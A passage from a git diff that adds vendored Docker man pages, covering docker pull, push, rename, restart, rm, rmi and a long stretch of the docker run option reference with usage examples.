to pull from. For example, if you have +set up a local registry, you can specify its path to pull from it. A registry +path is similar to a URL, but does not contain a protocol specifier (`https://`). + +The following command pulls the `testing/test-image` image from a local registry +listening on port 5000 (`myregistry.local:5000`): + + $ docker pull myregistry.local:5000/testing/test-image + +Registry credentials are managed by **docker-login(1)**. + +Docker uses the `https://` protocol to communicate with a registry, unless the +registry is allowed to be accessed over an insecure connection. Refer to the +[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries) +section in the online documentation for more information. + + +## Pull a repository with multiple images + +By default, `docker pull` pulls a *single* image from the registry. A repository +can contain multiple images. To pull all images from a repository, provide the +`-a` (or `--all-tags`) option when using `docker pull`. + +This command pulls all images from the `fedora` repository: + + $ docker pull --all-tags fedora + + Pulling repository fedora + ad57ef8d78d7: Download complete + 105182bb5e8b: Download complete + 511136ea3c5a: Download complete + 73bd853d2ea5: Download complete + .... + + Status: Downloaded newer image for fedora + +After the pull has completed use the `docker images` command to see the +images that were pulled. The example below shows all the `fedora` images +that are present locally: + + $ docker images fedora + + REPOSITORY TAG IMAGE ID CREATED SIZE + fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB + fedora 20 105182bb5e8b 5 days ago 372.7 MB + fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB + fedora latest 105182bb5e8b 5 days ago 372.7 MB + + +## Canceling a pull + +Killing the `docker pull` process, for example by pressing `CTRL-c` while it is +running in a terminal, will terminate the pull operation. + + $ docker pull fedora + + Using default tag: latest + latest: Pulling from library/fedora + a3ed95caeb02: Pulling fs layer + 236608c7b546: Pulling fs layer + ^C + +> **Note**: Technically, the Engine terminates a pull operation when the +> connection between the Docker Engine daemon and the Docker Engine client +> initiating the pull is lost. If the connection with the Engine daemon is +> lost for other reasons than a manual interaction, the pull is also aborted. + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +August 2014, updated by Sven Dowideit +April 2015, updated by John Willis +April 2015, updated by Mary Anthony for v2 +September 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md new file mode 100644 index 0000000000..847e66d2e4 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-push.1.md @@ -0,0 +1,63 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-push - Push an image or a repository to a registry + +# SYNOPSIS +**docker push** +[**--help**] +NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] + +# DESCRIPTION + +Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) +registry or to a self-hosted one. + +Refer to **docker-tag(1)** for more information about valid image and tag names. + +Killing the **docker push** process, for example by pressing **CTRL-c** while it +is running in a terminal, terminates the push operation. + +Registry credentials are managed by **docker-login(1)**. + + +# OPTIONS + +**--disable-content-trust** + Skip image verification (default true) + +**--help** + Print usage statement + +# EXAMPLES + +## Pushing a new image to a registry + +First save the new image by finding the container ID (using **docker ps**) +and then committing it to a new image name. Note that only a-z0-9-_. are +allowed when naming images: + + # docker commit c16378f943fe rhel-httpd + +Now, push the image to the registry using the image ID. In this example the +registry is on host named `registry-host` and listening on port `5000`. To do +this, tag the image with the host name or IP address, and the port of the +registry: + + # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd + # docker push registry-host:5000/myadmin/rhel-httpd + +Check that this worked by running: + + # docker images + +You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` +listed. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md new file mode 100644 index 0000000000..eaeea5c6e0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-rename.1.md @@ -0,0 +1,15 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCTOBER 2014 +# NAME +docker-rename - Rename a container + +# SYNOPSIS +**docker rename** +CONTAINER NEW_NAME + +# OPTIONS +There are no available options. + +# DESCRIPTION +Rename a container. Container may be running, paused or stopped. diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md new file mode 100644 index 0000000000..271c4eee1b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-restart.1.md @@ -0,0 +1,26 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-restart - Restart one or more containers + +# SYNOPSIS +**docker restart** +[**--help**] +[**-t**|**--time**[=*10*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION +Restart each container listed. + +# OPTIONS +**--help** + Print usage statement + +**-t**, **--time**=*10* + Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md new file mode 100644 index 0000000000..2105288d0d --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-rm.1.md @@ -0,0 +1,72 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-rm - Remove one or more containers + +# SYNOPSIS +**docker rm** +[**-f**|**--force**] +[**-l**|**--link**] +[**-v**|**--volumes**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +**docker rm** will remove one or more containers from the host node. The +container name or ID can be used. This does not remove images. You cannot +remove a running container unless you use the **-f** option. To see all +containers on a host use the **docker ps -a** command. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--force**=*true*|*false* + Force the removal of a running container (uses SIGKILL). The default is *false*. + +**-l**, **--link**=*true*|*false* + Remove the specified link and not the underlying container. The default is *false*. + +**-v**, **--volumes**=*true*|*false* + Remove the volumes associated with the container. The default is *false*. + +# EXAMPLES + +## Removing a container using its ID + +To remove a container using its ID, find either from a **docker ps -a** +command, or use the ID returned from the **docker run** command, or retrieve +it from a file used to store it using the **docker run --cidfile**: + + docker rm abebf7571666 + +## Removing a container using the container name + +The name of the container can be found using the **docker ps -a** +command. The use that name as follows: + + docker rm hopeful_morse + +## Removing a container and all associated volumes + + $ docker rm -v redis + redis + +This command will remove the container and any volumes associated with it. +Note that if a volume was specified with a name, it will not be removed. + + $ docker create -v awesome:/foo -v /bar --name hello redis + hello + $ docker rm -v hello + +In this example, the volume for `/foo` will remain in tact, but the volume for +`/bar` will be removed. The same behavior holds for volumes inherited with +`--volumes-from`. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +August 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md new file mode 100644 index 0000000000..35bf8aac6a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-rmi.1.md @@ -0,0 +1,42 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-rmi - Remove one or more images + +# SYNOPSIS +**docker rmi** +[**-f**|**--force**] +[**--help**] +[**--no-prune**] +IMAGE [IMAGE...] + +# DESCRIPTION + +Removes one or more images from the host node. This does not remove images from +a registry. You cannot remove an image of a running container unless you use the +**-f** option. To see all images on a host use the **docker images** command. + +# OPTIONS +**-f**, **--force**=*true*|*false* + Force removal of the image. The default is *false*. + +**--help** + Print usage statement + +**--no-prune**=*true*|*false* + Do not delete untagged parents. The default is *false*. + +# EXAMPLES + +## Removing an image + +Here is an example of removing an image: + + docker rmi fedora/httpd + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md new file mode 100644 index 0000000000..8c1018a1e2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-run.1.md @@ -0,0 +1,1055 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-run - Run a command in a new container + +# SYNOPSIS +**docker run** +[**-a**|**--attach**[=*[]*]] +[**--add-host**[=*[]*]] +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--blkio-weight-device**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cap-add**[=*[]*]] +[**--cap-drop**[=*[]*]] +[**--cgroup-parent**[=*CGROUP-PATH*]] +[**--cidfile**[=*CIDFILE*]] +[**--cpu-count**[=*0*]] +[**--cpu-percent**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpus**[=*0.0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**-d**|**--detach**] +[**--detach-keys**[=*[]*]] +[**--device**[=*[]*]] +[**--device-read-bps**[=*[]*]] +[**--device-read-iops**[=*[]*]] +[**--device-write-bps**[=*[]*]] +[**--device-write-iops**[=*[]*]] +[**--dns**[=*[]*]] +[**--dns-option**[=*[]*]] +[**--dns-search**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--entrypoint**[=*ENTRYPOINT*]] +[**--env-file**[=*[]*]] +[**--expose**[=*[]*]] +[**--group-add**[=*[]*]] +[**-h**|**--hostname**[=*HOSTNAME*]] +[**--help**] +[**--init**] +[**--init-path**[=*[]*]] +[**-i**|**--interactive**] +[**--ip**[=*IPv4-ADDRESS*]] +[**--ip6**[=*IPv6-ADDRESS*]] +[**--ipc**[=*IPC*]] +[**--isolation**[=*default*]] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-l**|**--label**[=*[]*]] +[**--label-file**[=*[]*]] +[**--link**[=*[]*]] +[**--link-local-ip**[=*[]*]] +[**--log-driver**[=*[]*]] +[**--log-opt**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--mac-address**[=*MAC-ADDRESS*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*LIMIT*]] +[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] +[**--name**[=*NAME*]] +[**--network-alias**[=*[]*]] +[**--network**[=*"bridge"*]] +[**--oom-kill-disable**] +[**--oom-score-adj**[=*0*]] +[**-P**|**--publish-all**] +[**-p**|**--publish**[=*[]*]] +[**--pid**[=*[PID]*]] +[**--userns**[=*[]*]] +[**--pids-limit**[=*PIDS_LIMIT*]] +[**--privileged**] +[**--read-only**] +[**--restart**[=*RESTART*]] +[**--rm**] +[**--security-opt**[=*[]*]] +[**--storage-opt**[=*[]*]] +[**--stop-signal**[=*SIGNAL*]] +[**--stop-timeout**[=*TIMEOUT*]] +[**--shm-size**[=*[]*]] +[**--sig-proxy**[=*true*]] +[**--sysctl**[=*[]*]] +[**-t**|**--tty**] +[**--tmpfs**[=*[CONTAINER-DIR[:]*]] +[**-u**|**--user**[=*USER*]] +[**--ulimit**[=*[]*]] +[**--uts**[=*[]*]] +[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] +[**--volume-driver**[=*DRIVER*]] +[**--volumes-from**[=*[]*]] +[**-w**|**--workdir**[=*WORKDIR*]] +IMAGE [COMMAND] [ARG...] + +# DESCRIPTION + +Run a process in a new container. **docker run** starts a process with its own +file system, its own networking, and its own isolated process tree. The IMAGE +which starts the process may define defaults related to the process that will be +run in the container, the networking to expose, and more, but **docker run** +gives final control to the operator or administrator who starts the container +from the image. For that reason **docker run** has more options than any other +Docker command. + +If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and +all image dependencies, from the repository in the same way running **docker +pull** IMAGE, before it starts the container from that image. + +# OPTIONS +**-a**, **--attach**=[] + Attach to STDIN, STDOUT or STDERR. + + In foreground mode (the default when **-d** +is not specified), **docker run** can start the process in the container +and attach the console to the process's standard input, output, and standard +error. It can even pretend to be a TTY (this is what most commandline +executables expect) and pass along signals. The **-a** option can be set for +each of stdin, stdout, and stderr. + +**--add-host**=[] + Add a custom host-to-IP mapping (host:ip) + + Add a line to /etc/hosts. The format is hostname:ip. The **--add-host** +option can be set multiple times. + +**--blkio-weight**=*0* + Block IO weight (relative weight) accepts a weight value between 10 and 1000. + +**--blkio-weight-device**=[] + Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). + +**--cpu-shares**=*0* + CPU shares (relative weight) + + By default, all containers get the same proportion of CPU cycles. This proportion +can be modified by changing the container's CPU share weighting relative +to the weighting of all other running containers. + +To modify the proportion from the default of 1024, use the **--cpu-shares** +flag to set the weighting to 2 or higher. + +The proportion will only apply when CPU-intensive processes are running. +When tasks in one container are idle, other containers can use the +left-over CPU time. The actual amount of CPU time will vary depending on +the number of containers running on the system. + +For example, consider three containers, one has a cpu-share of 1024 and +two others have a cpu-share setting of 512. When processes in all three +containers attempt to use 100% of CPU, the first container would receive +50% of the total CPU time. If you add a fourth container with a cpu-share +of 1024, the first container only gets 33% of the CPU. The remaining containers +receive 16.5%, 16.5% and 33% of the CPU. + +On a multi-core system, the shares of CPU time are distributed over all CPU +cores. Even if a container is limited to less than 100% of CPU time, it can +use 100% of each individual CPU core. + +For example, consider a system with more than three cores. If you start one +container **{C0}** with **-c=512** running one process, and another container +**{C1}** with **-c=1024** running two processes, this can result in the following +division of CPU shares: + + PID container CPU CPU share + 100 {C0} 0 100% of CPU0 + 101 {C1} 1 100% of CPU1 + 102 {C1} 2 100% of CPU2 + +**--cap-add**=[] + Add Linux capabilities + +**--cap-drop**=[] + Drop Linux capabilities + +**--cgroup-parent**="" + Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist. + +**--cidfile**="" + Write the container ID to the file + +**--cpu-count**=*0* + Limit the number of CPUs available for execution by the container. + + On Windows Server containers, this is approximated as a percentage of total CPU usage. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-percent**=*0* + Limit the percentage of CPU available for execution by a container running on a Windows daemon. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-period**=*0* + Limit the CPU CFS (Completely Fair Scheduler) period + + Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. + +**--cpuset-cpus**="" + CPUs in which to allow execution (0-3, 0,1) + +**--cpuset-mems**="" + Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + + If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` +then processes in your Docker container will only use memory from the first +two memory nodes. + +**--cpu-quota**=*0* + Limit the CPU CFS (Completely Fair Scheduler) quota + + Limit the container's CPU usage. By default, containers run with the full +CPU resource. This flag tell the kernel to restrict the container's CPU usage +to the quota you specify. + +**--cpu-rt-period**=0 + Limit the CPU real-time period in microseconds + + Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. + +**--cpu-rt-runtime**=0 + Limit the CPU real-time runtime in microseconds + + Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: + Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. + + The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. + +**--cpus**=0.0 + Number of CPUs. The default is *0.0* which means no limit. + +**-d**, **--detach**=*true*|*false* + Detached mode: run the container in the background and print the new container ID. The default is *false*. + + At any time you can run **docker ps** in +the other shell to view a list of the running containers. You can reattach to a +detached container with **docker attach**. If you choose to run a container in +the detached mode, then you cannot use the **-rm** option. + + When attached in the tty mode, you can detach from the container (and leave it +running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`. +You configure the key sequence using the **--detach-keys** option or a configuration file. +See **config-json(5)** for documentation on using a configuration file. + +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**--device**=[] + Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) + +**--device-read-bps**=[] + Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb) + +**--device-read-iops**=[] + Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000) + +**--device-write-bps**=[] + Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb) + +**--device-write-iops**=[] + Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000) + +**--dns-search**=[] + Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) + +**--dns-option**=[] + Set custom DNS options + +**--dns**=[] + Set custom DNS servers + + This option can be used to override the DNS +configuration passed to the container. Typically this is necessary when the +host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this +is the case the **--dns** flags is necessary for every run. + +**-e**, **--env**=[] + Set environment variables + + This option allows you to specify arbitrary +environment variables that are available for the process that will be launched +inside of the container. + +**--entrypoint**="" + Overwrite the default ENTRYPOINT of the image + + This option allows you to overwrite the default entrypoint of the image that +is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND +because it specifies what executable to run when the container starts, but it is +(purposely) more difficult to override. The ENTRYPOINT gives a container its +default nature or behavior, so that when you set an ENTRYPOINT you can run the +container as if it were that binary, complete with default options, and you can +pass in more options via the COMMAND. But, sometimes an operator may want to run +something else inside the container, so you can override the default ENTRYPOINT +at runtime by using a **--entrypoint** and a string to specify the new +ENTRYPOINT. + +**--env-file**=[] + Read in a line delimited file of environment variables + +**--expose**=[] + Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker +that the container listens on the specified network ports at runtime. Docker +uses this information to interconnect containers using links and to set up port +redirection on the host system. + +**--group-add**=[] + Add additional groups to run as + +**-h**, **--hostname**="" + Container host name + + Sets the container host name that is available inside the container. + +**--help** + Print usage statement + +**--init** + Run an init inside the container that forwards signals and reaps processes + +**--init-path**="" + Path to the docker-init binary + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + + When set to true, keep stdin open even if not attached. The default is false. + +**--ip**="" + Sets the container's interface IPv4 address (e.g. 172.23.0.9) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ip6**="" + Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ipc**="" + Default is to create a private IPC namespace (POSIX SysV IPC) for the container + 'container:': reuses another container shared memory, semaphores and message queues + 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. Note +that the default on Windows server is `process`, and the default on Windows client +is `hyperv`. Linux only supports `default`. + +**-l**, **--label**=[] + Set metadata on the container (e.g., --label com.example.key=value) + +**--kernel-memory**="" + Kernel memory limit (format: `[]`, where unit = b, k, m or g) + + Constrains the kernel memory available to a container. If a limit of 0 +is specified (not using `--kernel-memory`), the container's kernel memory +is not limited. If you specify a limit, it may be rounded up to a multiple +of the operating system's page size and the value can be very large, +millions of trillions. + +**--label-file**=[] + Read in a line delimited file of labels + +**--link**=[] + Add link to another container in the form of :alias or just +in which case the alias will match the name + + If the operator +uses **--link** when starting the new client container, then the client +container can access the exposed port via a private networking interface. Docker +will set some environment variables in the client container to help indicate +which interface and port to use. + +**--link-local-ip**=[] + Add one or more link-local IPv4/IPv6 addresses to the container's interface + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Logging driver for the container. Default is defined by daemon `--log-driver` flag. + **Warning**: the `docker logs` command works only for the `json-file` and + `journald` logging drivers. + +**--log-opt**=[] + Logging driver specific options. + +**-m**, **--memory**="" + Memory limit (format: [], where unit = b, k, m or g) + + Allows you to constrain the memory available to a container. If the host +supports swap memory, then the **-m** memory setting can be larger than physical +RAM. If a limit of 0 is specified (not using **-m**), the container's memory is +not limited. The actual limit may be rounded up to a multiple of the operating +system's page size (the value would be very large, that's millions of trillions). + +**--memory-reservation**="" + Memory soft limit (format: [], where unit = b, k, m or g) + + After setting memory reservation, when the system detects memory contention +or low memory, containers are forced to restrict their consumption to their +reservation. So you should always set the value below **--memory**, otherwise the +hard limit will take precedence. By default, memory reservation will be the same +as memory limit. + +**--memory-swap**="LIMIT" + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. By default, the swap `LIMIT` will be set to double +the value of --memory. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--mac-address**="" + Container MAC address (e.g. 92:d0:c6:0a:29:33) + + Remember that the MAC address in an Ethernet network must be unique. +The IPv6 link-local address will be based on the device's MAC address +according to RFC4862. + +**--name**="" + Assign a name to the container + + The operator can identify a container in three ways: + UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”) + UUID short identifier (“f78375b1c487”) + Name (“jonah”) + + The UUID identifiers come from the Docker daemon, and if a name is not assigned +to the container with **--name** then the daemon will also generate a random +string name. The name is useful when defining links (see **--link**) (or any +other place you need to identify a container). This works for both background +and foreground Docker containers. + +**--network**="*bridge*" + Set the Network mode for the container + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. + '|': connect to a user-defined network + +**--network-alias**=[] + Add network-scoped alias for the container + +**--oom-kill-disable**=*true*|*false* + Whether to disable OOM Killer for the container or not. + +**--oom-score-adj**="" + Tune the host's OOM preferences for containers (accepts -1000 to 1000) + +**-P**, **--publish-all**=*true*|*false* + Publish all exposed ports to random ports on the host interfaces. The default is *false*. + + When set to true publish all exposed ports to the host interfaces. The +default is false. If the operator uses -P (or -p) then Docker will make the +exposed port accessible on the host and the ports will be available to any +client that can reach the host. When using -P, Docker will bind any exposed +port to a random port on the host within an *ephemeral port range* defined by +`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host +ports and the exposed ports, use `docker port`. + +**-p**, **--publish**=[] + Publish a container's port, or range of ports, to the host. + + Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort` +Both hostPort and containerPort can be specified as a range of ports. +When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. +(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox` +but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`) +With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage` +Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT` + +**--pid**="" + Set the PID mode for the container + Default is to create a private PID namespace for the container + 'container:': join another container's PID namespace + 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. + +**--userns**="" + Set the usernamespace mode for the container when `userns-remap` option is enabled. + **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). + +**--pids-limit**="" + Tune the container's pids limit. Set `-1` to have unlimited pids for the container. + +**--uts**=*host* + Set the UTS mode for the container + **host**: use the host's UTS namespace inside the container. + Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. + +**--privileged**=*true*|*false* + Give extended privileges to this container. The default is *false*. + + By default, Docker containers are +“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the +Docker container. This is because by default a container is not allowed to +access any devices. A “privileged” container is given access to all devices. + + When the operator executes **docker run --privileged**, Docker will enable access +to all devices on the host as well as set some configuration in AppArmor to +allow the container nearly all the same access to the host as processes running +outside of a container on the host. + +**--read-only**=*true*|*false* + Mount the container's root filesystem as read only. + + By default a container will have its root filesystem writable allowing processes +to write files anywhere. By specifying the `--read-only` flag the container will have +its root filesystem mounted as read only prohibiting any writes. + +**--restart**="*no*" + Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). + +**--rm**=*true*|*false* + Automatically remove the container when it exits. The default is *false*. + `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's +incompatible with any restart policy other than `none`. + +**--security-opt**=[] + Security Options + + "label=user:USER" : Set the label user for the container + "label=role:ROLE" : Set the label role for the container + "label=type:TYPE" : Set the label type for the container + "label=level:LEVEL" : Set the label level for the container + "label=disable" : Turn off label confinement for the container + "no-new-privileges" : Disable container processes from gaining additional privileges + + "seccomp=unconfined" : Turn off seccomp confinement for the container + "seccomp=profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter + + "apparmor=unconfined" : Turn off apparmor confinement for the container + "apparmor=your-profile" : Set the apparmor confinement profile for the container + +**--storage-opt**=[] + Storage driver options per container + + $ docker run -it --storage-opt size=120G fedora /bin/bash + + This (size) will allow to set the container rootfs size to 120G at creation time. + This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. + For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. + For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. + Under these conditions, user can pass any size less then the backing fs size. + +**--stop-signal**=*SIGTERM* + Signal to stop a container. Default is SIGTERM. + +**--stop-timeout**=*10* + Timeout (in seconds) to stop a container. Default is 10. + +**--shm-size**="" + Size of `/dev/shm`. The format is ``. + `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m`(megabytes), or `g` (gigabytes). + If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. + +**--sysctl**=SYSCTL + Configure namespaced kernel parameters at runtime + + IPC Namespace - current sysctls allowed: + + kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced + Sysctls beginning with fs.mqueue.* + + If you use the `--ipc=host` option these sysctls will not be allowed. + + Network Namespace - current sysctls allowed: + Sysctls beginning with net.* + + If you use the `--network=host` option these sysctls will not be allowed. + +**--sig-proxy**=*true*|*false* + Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*. + +**--memory-swappiness**="" + Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + +**-t**, **--tty**=*true*|*false* + Allocate a pseudo-TTY. The default is *false*. + + When set to true Docker can allocate a pseudo-tty and attach to the standard +input of any container. This can be used, for example, to run a throwaway +interactive shell. The default is false. + +The **-t** option is incompatible with a redirection of the docker client +standard input. + +**--tmpfs**=[] Create a tmpfs mount + + Mount a temporary filesystem (`tmpfs`) mount into a container, for example: + + $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image + + This command mounts a `tmpfs` at `/tmp` within the container. The supported mount +options are the same as the Linux default `mount` flags. If you do not specify +any options, the systems uses the following options: +`rw,noexec,nosuid,nodev,size=65536k`. + +**-u**, **--user**="" + Sets the username or UID used and optionally the groupname or GID for the specified command. + + The followings examples are all valid: + --user [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Without this argument the command will be run as root in the container. + +**--ulimit**=[] + Ulimit options + +**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] + Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker + bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker + container. If 'HOST-DIR' is omitted, Docker automatically creates the new + volume on the host. The `OPTIONS` are a comma delimited list and can be: + + * [rw|ro] + * [z|Z] + * [`[r]shared`|`[r]slave`|`[r]private`] + * [nocopy] + +The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` +can be an absolute path or a `name` value. A `name` value must start with an +alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or +`-` (hyphen). An absolute path starts with a `/` (forward slash). + +If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the +path you specify. If you supply a `name`, Docker creates a named volume by that +`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` +value. If you supply the `/foo` value, Docker creates a bind-mount. If you +supply the `foo` specification, Docker creates a named volume. + +You can specify multiple **-v** options to mount one or more mounts to a +container. To use these same mounts in other containers, specify the +**--volumes-from** option also. + +You can add `:ro` or `:rw` suffix to a volume to mount it read-only or +read-write mode, respectively. By default, the volumes are mounted read-write. +See examples. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change a label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. + +By default bind mounted volumes are `private`. That means any mounts done +inside container will not be visible on host and vice-a-versa. One can change +this behavior by specifying a volume mount propagation property. Making a +volume `shared` mounts done under that volume inside container will be +visible on host and vice-a-versa. Making a volume 